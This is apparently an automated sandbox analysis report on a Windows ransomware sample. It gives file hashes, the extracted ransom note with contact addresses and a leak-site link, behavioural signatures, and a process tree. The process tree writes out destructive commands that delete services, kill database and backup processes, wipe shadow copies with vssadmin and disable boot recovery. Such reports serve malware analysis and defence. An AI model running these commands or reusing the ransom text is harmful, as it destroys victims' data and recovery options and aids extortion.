Analysis

  • max time kernel
    137s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-10-2022 02:20

General

  • Target

    2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe

  • Size

    159KB

  • MD5

    ddce5db099bab8bc56d5ac70d83842a0

  • SHA1

    7cd97f3e7a64cf10727ffff9634b9f2f0ed69c9d

  • SHA256

    2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd

  • SHA512

    859801169bd7f26f6918ecea0aee1c9473ac25dc74c861642efd428f6c2d3644d5f64d7113da1d96120b8eca4ee0dcfb26f082c2c8d1a63a8252713ab3fb9c23

  • SSDEEP

    3072:HfCpcDozERHWkC1rd3CC5UB5KvSS0+9Pzo9p04/t9LU5Uht9e8A+BVfRbixvJ+L:HfCpc/RHcQC50e0QPCiEtVvthAJg

Score
10/10

Malware Config

Extracted

Path

C:\$Recycle.Bin\S-1-5-21-929662420-1054238289-2961194603-1000\RECOVERY FILES.txt

Ransom Note
YOUR FILES ARE ENCRYPTED !!! TO DECRYPT, FOLLOW THE INSTRUCTIONS: To recover data you need decrypt tool. To get the decrypt tool you should: 1.In the letter include your personal ID! Send me this ID in your first email to me! 2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files! 3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! 4.We can decrypt few files in quality the evidence that we have the decoder. Do not rename, do not use third-party software or the data will be permanently damaged CONTACT US: [email protected] If first email will not reply in 24 hours then contact with reserve address: [email protected] YOUR PERSONAL ID: 4F6BC6F3DD3D In case of non-payment of the ransom, your data may be published in the public domain. Our page in twitter with data leaks: https://twitter.com/mallox_leaks �
URLs

https://twitter.com/mallox_leaks

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe
    "C:\Users\Admin\AppData\Local\Temp\2009bfc16bdd591b2bacd8a9893887acab0068c5ecf8d8486b889c4ba6fe4edd.exe"
    1⤵
    • Modifies extensions of user files
    • Checks computer location settings
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3080
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C sc delete MsDtsServer100&&sc delete MSSQL$SOPHOS&&sc delete MSSQLFDLauncher&&sc delete MSSQLSERVER&&sc delete MSSQLServerADHelper100&&sc delete MSSQLServerOLAPService&&sc delete ReportServer&&sc delete SQLAgent$SOPHOS&&sc delete "SQLANYs_sem5"&&sc delete SQLBrowser&&sc delete SQLSERVERAGENT&&sc delete SQLWriter&&sc delete B1LicenseService&&sc delete b1s50000&&sc delete b1s50001&&sc delete b1s50002&&sc delete B1ServerTools&&sc delete B1ServerTools64&&sc delete B1Workflow&&sc delete COMSysApp&&sc delete Gatekeeper64&&sc delete isapnp&&sc delete "SAP Business One RSP Agent Service"&&sc delete SBOClientAgent&&sc delete "SBODI_Server"&&sc delete SBOMail&&sc delete SBOWFDataAccess&&taskkill /f /im db*&&taskkill /f /im apache*&&taskkill /f /im mysql*&&taskkill /f /im Notifier*&&taskkill /f /im IBM*&&taskkill /f /im copy*&&taskkill /f /im store*&&taskkill /f /im sql*&&taskkill /f /im vee*&&taskkill /f /im wrsa*&&taskkill /f /im postg*&&taskkill /f /im sage*&&taskkill /f /im msdt*&&taskkill /f /im ora*&&taskkill /f /im microsoft*&&taskkill /f /im backup*&&taskkill /f /im http*&&taskkill /f /im office*&&taskkill /f /im cube*&&taskkill /f /im team*&&taskkill /f /im b1*&&taskkill /f /im sbo*&&taskkill /f /im reporting*&&taskkill /f /im sav*&&taskkill /f /im fd*&&taskkill /f /im microsoft*&&net stop MSSQLFDLauncher&&net stop MSSQLServerOLAPService&&net stop ReportServer
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4452
      • C:\Windows\SysWOW64\sc.exe
        sc delete MsDtsServer100
        3⤵
        • Launches sc.exe
        PID:4944
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
      2⤵
        PID:1536
      • C:\Windows\system32\vssadmin.exe
        "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
        2⤵
        • Interacts with shadow copies
        PID:652
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
        2⤵
          PID:3120
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3164

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads